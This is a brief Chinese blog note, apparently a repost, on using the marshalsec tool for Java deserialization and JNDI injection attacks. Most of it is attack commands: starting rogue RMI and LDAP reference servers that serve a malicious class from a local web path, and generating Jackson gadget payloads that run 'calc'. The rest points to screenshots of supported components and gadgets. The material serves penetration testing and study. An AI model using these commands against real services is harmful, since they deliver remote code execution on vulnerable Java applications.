# marshalsec使用

开启rmi服务,恶意类放到服务上

D:\jdk_1.8\bin\java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://127.0.0.1/css/#ExportObject 1099

开启ldap服务

D:\jdk_1.8\bin\java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1/css/#ExportObject 1389

参考链接
列出所有jackson的gadgets传参为calc

D:\jdk_1.8\bin\java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a exploit.exec="calc"

# marshalsec使用_第1张图片
所有支持的组件
# marshalsec使用_第2张图片
所有支持的gadgets
# marshalsec使用_第3张图片
Alt text
如果想查找组件可以生成的gadgets有哪些
以Jackson为例

D:\jdk_1.8\bin\java.exe -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson

Alt text
如果想查找gadgets可以用于哪些组件生成
1、以resin为例,可以查看手册
# marshalsec使用_第4张图片
2、选择想看的gadgets->find usages
# marshalsec使用_第5张图片
参考链接

转载于:https://www.cnblogs.com/afanti/p/11266087.html

你可能感兴趣的:(# marshalsec使用)